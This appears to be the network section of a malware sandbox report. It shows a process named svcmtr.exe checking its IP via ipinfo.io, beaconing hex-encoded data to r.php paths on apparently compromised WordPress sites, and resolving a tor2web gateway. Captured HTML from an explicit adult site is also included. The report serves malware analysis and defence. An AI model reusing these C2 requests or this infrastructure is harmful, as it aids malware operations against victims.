                                                                                                                          Jan 8, 2025 21:11:18.356714010 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:20.054164886 CET49176443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:11:20.054188967 CET44349176172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:23.798371077 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:23.798420906 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:11:23.803670883 CET804916334.117.59.81192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:23.803735971 CET4916380192.168.2.2234.117.59.81
                                                                                                                          Jan 8, 2025 21:11:24.173978090 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:24.773401022 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:25.970403910 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:28.375252008 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:33.174930096 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:11:42.790431976 CET4916880192.168.2.2267.22.44.2
                                                                                                                          Jan 8, 2025 21:12:07.842947960 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:07.842983961 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:07.843043089 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:07.843436956 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:07.843451977 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.500659943 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.501429081 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:08.501452923 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.501843929 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.506295919 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:08.506378889 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.715336084 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:08.715379953 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:08.715395927 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:18.416090012 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:18.416155100 CET44349178172.217.168.68192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:18.416202068 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:20.059580088 CET49178443192.168.2.22172.217.168.68
                                                                                                                          Jan 8, 2025 21:12:20.059606075 CET44349178172.217.168.68192.168.2.22

                                                                                                                          UDP Packets

                                                                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                                                                          Jan 8, 2025 21:09:29.232800007 CET138138192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:09:37.302721977 CET5456253192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:09:37.309180021 CET53545628.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:37.862337112 CET5291753192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:09:37.874737024 CET53529178.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:37.878921986 CET6275153192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:09:38.023437023 CET53627518.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:59.419549942 CET5789353192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:09:59.445717096 CET53578938.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:09:59.446379900 CET137137192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:10:00.196949959 CET137137192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:10:00.961369991 CET137137192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:10:01.998435974 CET5482153192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:02.005569935 CET53548218.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:03.342324972 CET5471953192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:03.388170958 CET53547198.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:04.744935036 CET4988153192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:04.786917925 CET53498818.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:05.438707113 CET5499853192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:05.456825972 CET53549988.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:06.094495058 CET5278153192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:07.107826948 CET5278153192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:08.121817112 CET5278153192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:08.180713892 CET53527818.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:08.210772991 CET6392653192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:08.222201109 CET53639268.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:08.228147030 CET6551053192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:10:08.240149975 CET53655108.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:08.656316042 CET53527818.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:10:08.703730106 CET53527818.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:04.572468996 CET53493848.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:04.746373892 CET137137192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:11:04.821182966 CET53573908.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:05.495688915 CET137137192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:11:05.811176062 CET53605078.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:06.259335995 CET137137192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:11:07.777133942 CET4960853192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:11:07.777322054 CET6148653192.168.2.228.8.8.8
                                                                                                                          Jan 8, 2025 21:11:07.783598900 CET53614868.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:07.784039974 CET53496088.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:23.531373978 CET53518288.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:28.949892998 CET138138192.168.2.22192.168.2.255
                                                                                                                          Jan 8, 2025 21:11:30.455154896 CET53545218.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:41.378314972 CET53496908.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:11:58.985836029 CET53587548.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:04.556365013 CET53596048.8.8.8192.168.2.22
                                                                                                                          Jan 8, 2025 21:12:44.882896900 CET53594758.8.8.8192.168.2.22

                                                                                                                          ICMP Packets

                                                                                                                          TimestampSource IPDest IPChecksumCodeType
                                                                                                                          Jan 8, 2025 21:10:08.656404018 CET192.168.2.228.8.8.8d006(Port unreachable)Destination Unreachable
                                                                                                                          Jan 8, 2025 21:11:04.572544098 CET192.168.2.228.8.8.8d04c(Port unreachable)Destination Unreachable

                                                                                                                          DNS Queries

                                                                                                                          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                          Jan 8, 2025 21:09:37.302721977 CET192.168.2.228.8.8.80x270eStandard query (0)ipinfo.ioA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:09:37.862337112 CET192.168.2.228.8.8.80xda68Standard query (0)ezglobalmarketing.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:09:37.878921986 CET192.168.2.228.8.8.80xbc57Standard query (0)fgainterests.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:09:59.419549942 CET192.168.2.228.8.8.80xbaacStandard query (0)ledshoppen.nlA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:01.998435974 CET192.168.2.228.8.8.80x28eaStandard query (0)serenitynowbooksandgifts.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:03.342324972 CET192.168.2.228.8.8.80xb412Standard query (0)www.serenitynowbooksandgifts.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:04.744935036 CET192.168.2.228.8.8.80xdc80Standard query (0)teenpornotube.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:05.438707113 CET192.168.2.228.8.8.80x5b3cStandard query (0)www.teenpornotube.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:06.094495058 CET192.168.2.228.8.8.80x570aStandard query (0)shmetterheath.ruA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:07.107826948 CET192.168.2.228.8.8.80x570aStandard query (0)shmetterheath.ruA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.121817112 CET192.168.2.228.8.8.80x570aStandard query (0)shmetterheath.ruA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.210772991 CET192.168.2.228.8.8.80x2867Standard query (0)zpr5huq4bgmutfnf.onion.toA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.228147030 CET192.168.2.228.8.8.80xeb70Standard query (0)zpr5huq4bgmutfnf.tor2web.orgA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:11:07.777133942 CET192.168.2.228.8.8.80x534bStandard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:11:07.777322054 CET192.168.2.228.8.8.80x25a4Standard query (0)www.google.com65IN (0x0001)false

                                                                                                                          DNS Answers

                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                          Jan 8, 2025 21:09:37.309180021 CET8.8.8.8192.168.2.220x270eNo error (0)ipinfo.io34.117.59.81A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:09:37.874737024 CET8.8.8.8192.168.2.220xda68Name error (3)ezglobalmarketing.comnonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:09:38.023437023 CET8.8.8.8192.168.2.220xbc57No error (0)fgainterests.com199.116.254.169A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:02.005569935 CET8.8.8.8192.168.2.220x28eaNo error (0)serenitynowbooksandgifts.com185.230.63.171A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:02.005569935 CET8.8.8.8192.168.2.220x28eaNo error (0)serenitynowbooksandgifts.com185.230.63.186A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:02.005569935 CET8.8.8.8192.168.2.220x28eaNo error (0)serenitynowbooksandgifts.com185.230.63.107A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:03.388170958 CET8.8.8.8192.168.2.220xb412No error (0)www.serenitynowbooksandgifts.comcdn1.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:03.388170958 CET8.8.8.8192.168.2.220xb412No error (0)cdn1.wixdns.nettd-ccm-neg-87-45.wixdns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:03.388170958 CET8.8.8.8192.168.2.220xb412No error (0)td-ccm-neg-87-45.wixdns.net34.149.87.45A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:04.786917925 CET8.8.8.8192.168.2.220xdc80No error (0)teenpornotube.org67.22.44.2A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:05.456825972 CET8.8.8.8192.168.2.220x5b3cNo error (0)www.teenpornotube.orgteenpornotube.orgCNAME (Canonical name)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:05.456825972 CET8.8.8.8192.168.2.220x5b3cNo error (0)teenpornotube.org67.22.44.2A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.180713892 CET8.8.8.8192.168.2.220x570aName error (3)shmetterheath.runonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.222201109 CET8.8.8.8192.168.2.220x2867Name error (3)zpr5huq4bgmutfnf.onion.tononenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.240149975 CET8.8.8.8192.168.2.220xeb70No error (0)zpr5huq4bgmutfnf.tor2web.org103.198.0.111A (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.656316042 CET8.8.8.8192.168.2.220x570aServer failure (2)shmetterheath.runonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:10:08.703730106 CET8.8.8.8192.168.2.220x570aName error (3)shmetterheath.runonenoneA (IP address)IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:11:07.783598900 CET8.8.8.8192.168.2.220x25a4No error (0)www.google.com65IN (0x0001)false
                                                                                                                          Jan 8, 2025 21:11:07.784039974 CET8.8.8.8192.168.2.220x534bNo error (0)www.google.com172.217.168.68A (IP address)IN (0x0001)false

                                                                                                                          HTTP Request Dependency Graph

                                                                                                                          • serenitynowbooksandgifts.com
                                                                                                                          • www.serenitynowbooksandgifts.com
                                                                                                                          • ipinfo.io
                                                                                                                          • fgainterests.com
                                                                                                                          • teenpornotube.org
                                                                                                                          • www.teenpornotube.org

                                                                                                                          HTTP Packets

                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          0192.168.2.224916334.117.59.81803504C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 8, 2025 21:09:37.346493006 CET197OUTGET /ip HTTP/1.1
                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)
                                                                                                                          Host: ipinfo.io
                                                                                                                          Jan 8, 2025 21:09:37.818933964 CET241INHTTP/1.1 200 OK
                                                                                                                          date: Wed, 08 Jan 2025 20:09:36 GMT
                                                                                                                          content-type: text/plain; charset=utf-8
                                                                                                                          Content-Length: 12
                                                                                                                          access-control-allow-origin: *
                                                                                                                          via: 1.1 google
                                                                                                                          strict-transport-security: max-age=2592000; includeSubDomains
                                                                                                                          Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                                                                                                          Data Ascii: 8.46.123.189


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          1192.168.2.2249164199.116.254.169803504C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 8, 2025 21:09:38.033674002 CET617OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38914A0712A28548CB1A591D5BE2241C135B0E2F3FAB94EEE9E31C6BB0B8D33BD387F667397135C5EC483A155C0151211280780DA7581A2066232DDC3477639D3CA098F5C31FAE7319AB4DAE6A2EF1B042033039ED5685D79F8FCC098B742D884D5394719058E0C8D500DE20140A325CF0B HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Host: fgainterests.com
                                                                                                                          Connection: Keep-Alive


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          2192.168.2.2249165185.230.63.171803504C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 8, 2025 21:10:02.023974895 CET661OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Host: serenitynowbooksandgifts.com
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 8, 2025 21:10:02.476206064 CET682INHTTP/1.1 301 Moved Permanently
                                                                                                                          Location: https://serenitynowbooksandgifts.com/wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25A85DC92602B4A566325A924DE498C743DE86E56DEC092D8E1DC4D0D20931C25E7D53671538B32008CB2D6A0884D4B875FFFD208FE7C46FE57E409CB96CE738DA867312A20F0BDFF7692ACD754569A975
                                                                                                                          X-Seen-By: jKB0KR2wTEE1MYSdxvKSbciHE4dbw+wewoJ5nvKoyjE=
                                                                                                                          Connection: close
                                                                                                                          Content-Length: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          3192.168.2.224916867.22.44.2803504C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 8, 2025 21:10:04.792625904 CET618OUTGET /wp-content/themes/r.php?D0B1745184D4B19325F8CA239D78E804ABD3496A84C918846496CD97797104275B69DB8A8C4068125492B32EB37B14D06B1F0ACC7D785D9C3713D805BC844CFB276EA1E45EFCDFBCC2AE3ED592D28886FB0E5BED1BC965BF2FBEAAB49990078AA4D876A90C62830BBA201E36D4B4D38988D11DE0B3635F5AD99270B087204BF636044B17069B5451B4B2AD146AFCE933E23D0BF085567F9DE7B6C0446D7B4A25BD8C4E17EF6836F23642C06A5FF3A1CF2AEF4E14148B78507418AA0EAAE50DDC4F9D295FF1EF6F8F8C295F4189207899230F547B821D613C1DC3B1A419634028 HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Host: teenpornotube.org
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Jan 8, 2025 21:10:05.425394058 CET265INHTTP/1.1 301 Moved Permanently
                                                                                                                          Server: nginx
                                                                                                                          Date: Wed, 08 Jan 2025 20:10:05 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Location: http://www.teenpornotube.org/wp-content/themes/r.php
                                                                                                                          Set-Cookie: RNLBSERVERID=ded6551; path=/
                                                                                                                          Data Raw: 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 0


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          4192.168.2.224916967.22.44.2803504C:\Users\user\AppData\Roaming\svcmtr.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          Jan 8, 2025 21:10:05.465303898 CET203OUTGET /wp-content/themes/r.php HTTP/1.1
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0
                                                                                                                          Cookie: RNLBSERVERID=ded6551
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Host: www.teenpornotube.org
                                                                                                                          Jan 8, 2025 21:10:06.091027975 CET1236INHTTP/1.1 404 Not Found
                                                                                                                          Server: nginx
                                                                                                                          Date: Wed, 08 Jan 2025 20:10:06 GMT
                                                                                                                          Content-Type: text/html; charset=utf-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Set-Cookie: csrfst=tZC5D9Jx-1736367006-0d9f160c0fa1a6c5; path=/
                                                                                                                          Vary: Accept-Encoding, User-Agent
                                                                                                                          Data Raw: 31 66 35 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 54 65 65 6e 20 70 6f 72 6e 6f 20 74 75 62 65 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2d 32 33 33 38 35 36 36 34 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 2f 3e 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 73 74 61 74 69 63 2f 6d 61 69 6e 2d 32 33 33 38 35 36 36 34 2e 6a 73 22 20 61 73 79 6e 63 3d 22 61 73 79 6e 63 22 3e 3c 2f 73 63 [TRUNCATED]
                                                                                                                          Data Ascii: 1f53<!DOCTYPE html><html xmlns="http://www.w3.org/1999/xhtml"><head><title>Teen porno tube</title><meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"><link href="/static/main-23385664.css" rel="stylesheet" type="text/css" /><script src="/static/main-23385664.js" async="async"></script><script type="text/javascript"></script></head><body class="other"><script type="text/javascript">(function(m,e,t,r,i,k,a){m[i]=m[i]||function(){(m[i].a=m[i].a||[]).push(arguments)};m[i].l=1*new Date();k=e.createElement(t),a=e.getElementsByTagName(t)[0],k.async=1,k.src=r,a.parentNode.insertBefore(k,a)})(window,document,"script","https://mc.yandex.ru/metrika/tag.js","ym");ym(52673788,"init",{clickmap:true,trackLinks:true,accurateTrackBounce:true});</script><noscript><div><img src="https://mc.yandex.ru/watch/52673788" style="position:absolute; left:-9999px;" alt="" /></div></noscript><div id="head"><div class="wrap clearfix"><div class="sear
                                                                                                                          Jan 8, 2025 21:10:06.091058016 CET1236INData Raw: 63 68 22 3e 3c 66 6f 72 6d 20 61 63 74 69 6f 6e 3d 22 2f 73 65 61 72 63 68 22 20 6d 65 74 68 6f 64 3d 22 67 65 74 22 20 63 6c 61 73 73 3d 22 73 65 61 72 63 68 22 3e 3c 69 6e 70 75 74 20 74 79 70 65 3d 22 74 65 78 74 22 20 76 61 6c 75 65 3d 22 22
                                                                                                                          Data Ascii: ch"><form action="/search" method="get" class="search"><input type="text" value="" name="q" placeholder="Search..." /><input type="submit" value="Go" /></form></div><div class="left"><a href="/"><img src="http://images.cdnv.prontoservers.net/a
                                                                                                                          Jan 8, 2025 21:10:06.091075897 CET1236INData Raw: 70 65 3d 22 69 6d 61 67 65 2f 77 65 62 70 22 3e 3c 73 6f 75 72 63 65 20 73 72 63 73 65 74 3d 22 68 74 74 70 3a 2f 2f 69 6d 61 67 65 73 2e 63 64 6e 76 2e 70 72 6f 6e 74 6f 73 65 72 76 65 72 73 2e 6e 65 74 2f 73 63 2f 30 2f 31 30 2f 31 30 34 35 35
                                                                                                                          Data Ascii: pe="image/webp"><source srcset="http://images.cdnv.prontoservers.net/sc/0/10/10455/promo/crop/302x201/promo_7.jpg?validfrom=1736284800&validto=1736371200&hash=KMFwZ%2BVhkatnZSjor5CAAfhzjBQ%3D" type="image/jpeg"><img src="http://images.cdnv.pro
                                                                                                                          Jan 8, 2025 21:10:06.091089964 CET1236INData Raw: 36 32 38 34 38 30 30 26 76 61 6c 69 64 74 6f 3d 31 37 33 36 33 37 31 32 30 30 26 68 61 73 68 3d 7a 66 42 6a 77 56 79 42 45 58 33 4c 53 55 58 57 76 47 49 5a 33 78 74 55 68 25 32 46 45 25 33 44 22 3e 3c 2f 70 69 63 74 75 72 65 3e 3c 73 70 61 6e 20
                                                                                                                          Data Ascii: 6284800&validto=1736371200&hash=zfBjwVyBEX3LSUXWvGIZ3xtUh%2FE%3D"></picture><span class="scrub"><span></span></span><span class="duration">5:00</span><span class="hd"></span></a><a href="/videos/5500793" class="title" title="Maki Koizumi had s
                                                                                                                          Jan 8, 2025 21:10:06.091161966 CET896INData Raw: 72 73 20 41 6e 64 20 53 68 65 6c 62 65 65 20 4d 79 6e 65 20 54 6f 6e 67 75 65 20 45 61 63 68 20 4f 74 68 65 72 73 27 20 57 65 74 20 47 61 73 68 65 73 3c 2f 61 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 69 6e 66 6f 20 6c 65 66 74 22 3e 38 30 25 20
                                                                                                                          Data Ascii: rs And Shelbee Myne Tongue Each Others' Wet Gashes</a><span class="info left">80% Like</span><span class="info right">8 years ago</span></li><li><a href="/videos/4817609" class="thumb"><picture><source srcset="http://images.cdnv.prontoservers.
                                                                                                                          Jan 8, 2025 21:10:06.091178894 CET1236INData Raw: 65 6f 73 2f 34 38 31 37 36 30 39 22 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 20 74 69 74 6c 65 3d 22 4a 61 70 61 6e 65 73 65 20 63 75 74 69 65 20 4d 65 69 20 57 61 6b 61 6e 61 20 69 73 20 65 61 67 65 72 20 74 6f 20 72 69 64 65 20 61 20 64 69 63
                                                                                                                          Data Ascii: eos/4817609" class="title" title="Japanese cutie Mei Wakana is eager to ride a dick">Japanese cutie Mei Wakana is eager to ride a dick</a><span class="info left">100% Like</span><span class="info right">4 years ago</span></li><li><a href="/vid
                                                                                                                          Jan 8, 2025 21:10:06.091219902 CET1236INData Raw: 68 74 74 70 3a 2f 2f 69 6d 61 67 65 73 2e 63 64 6e 76 2e 70 72 6f 6e 74 6f 73 65 72 76 65 72 73 2e 6e 65 74 2f 73 63 2f 30 2f 39 38 2f 39 38 34 39 36 2f 70 72 6f 6d 6f 2f 63 72 6f 70 2f 33 30 32 78 32 30 31 2f 70 72 6f 6d 6f 5f 32 2e 77 65 62 70
                                                                                                                          Data Ascii: http://images.cdnv.prontoservers.net/sc/0/98/98496/promo/crop/302x201/promo_2.webp?validfrom=1736284800&validto=1736371200&hash=KIb1bhx6Nf%2FWtpmQn5xyaax3IJs%3D" type="image/webp"><source srcset="http://images.cdnv.prontoservers.net/sc/0/98/98
                                                                                                                          Jan 8, 2025 21:10:06.091233015 CET1236INData Raw: 31 32 2f 70 72 6f 6d 6f 2f 63 72 6f 70 2f 33 30 32 78 32 30 31 2f 70 72 6f 6d 6f 5f 31 36 2e 6a 70 67 3f 76 61 6c 69 64 66 72 6f 6d 3d 31 37 33 36 32 38 34 38 30 30 26 76 61 6c 69 64 74 6f 3d 31 37 33 36 33 37 31 32 30 30 26 68 61 73 68 3d 52 43
                                                                                                                          Data Ascii: 12/promo/crop/302x201/promo_16.jpg?validfrom=1736284800&validto=1736371200&hash=RC1EckMemmQSvW4%2F9ZcvLvAQgeI%3D" type="image/jpeg"><img src="http://images.cdnv.prontoservers.net/sc/0/85/85312/promo/crop/302x201/promo_16.jpg?validfrom=17362848
                                                                                                                          Jan 8, 2025 21:10:06.091295958 CET1236INData Raw: 3c 2f 70 69 63 74 75 72 65 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 63 72 75 62 22 3e 3c 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 75 72 61 74 69 6f 6e 22 3e 35 3a 30 32 3c 2f 73 70 61
                                                                                                                          Data Ascii: </picture><span class="scrub"><span></span></span><span class="duration">5:02</span></a><a href="/videos/5751005" class="title" title="Kanna Nozomi">Kanna Nozomi</a><span class="info left">100% Like</span><span class="info right">3 years ago</
